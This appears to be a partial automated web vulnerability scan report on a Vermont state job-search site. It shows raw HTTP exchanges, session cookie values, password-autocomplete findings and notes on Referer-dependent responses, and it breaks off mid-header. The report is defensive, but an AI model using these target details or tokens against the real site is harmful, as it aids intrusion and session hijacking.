GET /ada/works/jobsearch.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:49 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/works/linkview.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:51 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) server-error: true Content-Type: text/html; charset=UTF-8 Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/
Bookmark Error <b>You may be seeing this error as a result of bookmarking this page. Unfortunately, our site design will not allow the bookmarking of most internal pages.</b> If you wish to contact th ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /ada/works/resourcesoverview.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:50 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:la ...[SNIP]...
The cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.
Request
GET /favicon.ico HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 302 Moved Temporarily Connection: close Date: Fri, 29 Apr 2011 21:07:34 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ location: /ada/404/404_qry.cfm Content-Type: text/html; charset=UTF-8
<!-- vermontjoblink --><!-- vjlpub --><!-- App list: (vjlpub) --><!-- Load Balancing is Off -->
5. Password field with autocomplete enabled
There are 6 instances of this issue:
Most browsers have a facility to remember user credentials that are entered into HTML forms. This function can be configured by the user and also by applications which employ user credentials. If the function is enabled, then credentials entered by the user are stored on their local computer and retrieved by the browser on future visits to the same application.
The stored credentials can be captured by an attacker who gains access to the computer, either locally or through some remote compromise. Further, methods have existed whereby a malicious web site can retrieve the stored credentials for other applications, by exploiting browser vulnerabilities or through application-level cross-domain attacks.
Issue remediation
To prevent browsers from storing credentials entered into HTML forms, you should include the attribute autocomplete="off" within the FORM tag (to protect all form fields) or within the relevant INPUT tags (to protect specific individual fields).
The form contains the following password field with autocomplete enabled:
v_password
Request
GET /ada/ HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:06:48 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Set-Cookie: TEST=1;path=/ Set-Cookie: SYSTRANLANGUAGE=en;path=/ Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
The form contains the following password field with autocomplete enabled:
v_password
Request
GET /ada/default.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:49 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
The form contains the following password fields with autocomplete enabled:
v_password
v_passwordverify
Request
GET /ada/etp/etp_newuser_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:58 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Expires: {ts '2011-04-29 17:11:56'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate
The form contains the following password fields with autocomplete enabled:
password
passwordverify
Request
GET /ada/mn_registration_dsp.cfm HTTP/1.1 Host: www.vermontjoblink.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: TEST=1; SYSTRANLANGUAGE=en; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D; CFID=4223843;
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:57 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Pragma: no-cache Pragma: no-cache Expires: 06 Nov 1994 08:49:37 GMT Expires: {ts '2011-04-29 17:11:55'} Content-Type: text/html; charset=UTF-8 cache-control: no-cache, no-store, must-revalidate cache-control: no-cache, no-store, must-revalidate
The form contains the following password field with autocomplete enabled:
v_password
Request
GET /ada/works/Login.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:08:04 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
The form contains the following password field with autocomplete enabled:
v_password
Request
GET /ada/works/Login.cfm HTTP/1.1 Host: www.vermontjoblink.com Connection: keep-alive Referer: https://www.vermontjoblink.com/ada/mn_forgotpass.cfm?securitysys=on&securitysys=on&FormID=47&rand=340991 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: TEST=1; SYSTRANLANGUAGE=en; CFID=4223843; CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D
Response
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:11:55 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: CFTOKEN=e80bfbfb0520b4bf%2DA308A6C3%2DCFA9%2DA7BB%2D2AB6E9DD1A609D7D;path=/ Content-Type: text/html; charset=UTF-8
The application's responses appear to depend systematically on the presence or absence of the Referer header in requests. This behaviour does not necessarily constitute a security vulnerability, and you should investigate the nature of and reason for the differential responses to determine whether a vulnerability is present.
Common explanations for Referer-dependent responses include:
Referer-based access controls, where the application assumes that if you have arrived from one privileged location then you are authorised to access another privileged location. These controls can be trivially defeated by supplying an accepted Referer header in requests for the vulnerable function.
Attempts to prevent cross-site request forgery attacks by verifying that requests to perform privileged actions originated from within the application itself and not from some external location. Such defences are not robust - methods have existed through which an attacker can forge or mask the Referer header contained within a target user's requests, by leveraging client-side technologies such as Flash and other techniques.
Delivery of Referer-tailored content, such as welcome messages to visitors from specific domains, search-engine optimisation (SEO) techniques, and other ways of tailoring the user's experience. Such behaviours often have no security impact; however, unsafe processing of the Referer header may introduce vulnerabilities such as SQL injection and cross-site scripting. If parts of the document (such as META keywords) are updated based on search engine queries contained in the Referer header, then the application may be vulnerable to persistent code injection attacks, in which search terms are manipulated to cause malicious content to appear in responses served to other application users.
Issue remediation
The Referer header is not a robust foundation on which to build any security measures, such as access controls or defences against cross-site request forgery. Any such measures should be replaced with more secure alternatives that are not vulnerable to Referer spoofing.
If the contents of responses are updated based on Referer data, then the same defences against malicious input should be employed for the Referer header as for any other kind of user-supplied data.
HTTP/1.1 200 OK Connection: close Date: Fri, 29 Apr 2011 21:07:33 GMT Server: Microsoft-IIS/6.0 MicrosoftOfficeWebServer: 5.0_Pub X-Powered-By: ASP.NET PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0)) PICS-Label: (PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (n 0 s 0 v 0 l 0 oa 0 ob 0 oc 0 od 0 oe 0 of 0 og 0 oh 0 c 0))(PICS-1.0 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (v 0 s 0 n 0 l 0))(PICS-1.1 "http://www.rsac.org/ratingsv01.html" l by "joseph.lucia@state.vt.us" on "2009.02.17T14:57-0500" exp "2022.02.17T12:00-0500" r (l 0 s 0 v 0 o 0)) Set-Cookie: CFID=4223843;path=/ Set-Cookie: 